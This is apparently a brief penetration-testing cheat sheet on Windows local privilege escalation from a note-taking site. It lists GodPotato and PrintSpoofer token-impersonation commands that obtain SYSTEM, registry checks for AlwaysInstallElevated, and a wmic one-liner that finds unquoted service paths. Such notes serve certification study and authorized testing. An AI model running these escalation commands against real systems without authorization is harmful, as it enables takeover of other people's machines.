ZeroBox

Windows Local Privilege Escalation & LOLBAS

Local Windows privilege escalation vectors: Token impersonation (Potato exploits), Unquoted Service Paths, AlwaysInstallElevated, and LOLBAS.

winpeasgodpotatoprintspoofercertutilpowershell

On Windows, service accounts frequently hold privileges like SeImpersonatePrivilege that permit direct escalation to NT AUTHORITY\SYSTEM.

1. Token Impersonation Exploits

If whoami /priv reveals SeImpersonatePrivilege:

  GodPotato-NET4.exe -cmd "cmd.exe /c whoami"
  PrintSpoofer64.exe -i -c cmd

2. AlwaysInstallElevated Registry Keys

Check if MSI installers run with elevated permissions:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

3. Unquoted Service Paths

Detect unquoted service binary paths containing spaces:

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Stage binaries using 11. Offensive File Transfers Across Restricted Networks, then pivot toward domain control via 06. Active Directory Attack Paths & Domain Enumeration.

More CPTS notes

Keep these notes in your own private vault. Open CPTS notes in ZeroBox